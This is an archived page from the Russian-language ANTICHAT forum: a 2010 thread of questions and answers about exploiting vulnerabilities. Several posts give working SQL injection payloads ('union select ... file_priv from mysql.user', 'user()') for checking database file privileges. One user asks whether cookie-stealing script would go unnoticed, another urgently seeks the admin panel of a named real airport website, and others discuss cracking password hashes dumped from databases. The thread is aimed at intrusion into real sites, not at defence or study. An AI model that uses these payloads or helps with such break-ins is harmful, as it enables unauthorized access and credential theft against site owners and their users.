HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1559 из 2438 « Первая < 5591059145915091549 1555 1556 1557 1558 1559 1560 1561 1562 1563 1569160916592059 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15581  
Старый 12.11.2010, 00:06
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
Цитата:
Сообщение от None  
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Проверяем права на запись и чтение файлов

id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--

Y-есть права

N-нет прав
 
Ответить с цитированием

  #15582  
Старый 12.11.2010, 00:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
Цитата:
Сообщение от Mirrey  
Mirrey said:
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
а поиск на форуме поискать влом? сколько можно на одни и те же вопросы отвечать....просто 3.14здец полнейший...опять каникулы что ли?
 
Ответить с цитированием

  #15583  
Старый 12.11.2010, 00:11
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию
Цитата:
Сообщение от pinch  
pinch said:
Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--
Y-есть права
N-нет прав
Сообщение от Mirrey
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Код:
select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется

id=1+union+select+1,2,3,4,user()--

а затем уже проверять конкретного

id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='наш юзер под которым сидим'--
 
Ответить с цитированием

  #15584  
Старый 12.11.2010, 17:10
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию
Цитата:
Сообщение от Jer1cho  
Jer1cho said:
Сделал через (там кавчки не обязательны), если кому интересно.
...
Еще вопрос может ли браузер с какими-нибудь параноидальными дополнениями (есть ли вобще такие?) на безопасность заорать на +document.cookie, или антивирус засечь такое? очень важно чтобы никто не заметил.
Не думаю. Обычно параноики юзают NoScript, или просто тупо отрубают жабу.
 
Ответить с цитированием

  #15585  
Старый 12.11.2010, 18:39
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию
Так помогите найти админку то на http://www.pulkovoairport.ru/, нужно очень срочно!
 
Ответить с цитированием

  #15586  
Старый 12.11.2010, 21:17
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию
Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.

Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.

Что тут такое ?
 
Ответить с цитированием

  #15587  
Старый 12.11.2010, 21:23
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию
Цитата:
Сообщение от JohnnyBGoode  
JohnnyBGoode said:
Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.
Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.
Что тут такое ?
Мож тупо совпадение, что удалось сбрутить, и там есть соль ?
 
Ответить с цитированием

  #15588  
Старый 12.11.2010, 22:08
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
 
Ответить с цитированием

  #15589  
Старый 13.11.2010, 13:19
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию
ищи колумны password:hash:salt

или скинь в ПМ линк посмотрю и сбручу твой пароль )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #15590  
Старый 13.11.2010, 13:24
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию
подскажите пожалуйста что это за уязвимость

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//userttool-258-www.bigpoint.net/[/COLOR][/COLOR] 
 
Ответить с цитированием
Ответ
Страница 1559 из 2438 « Первая < 5591059145915091549 1555 1556 1557 1558 1559 1560 1561 1562 1563 1569160916592059 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ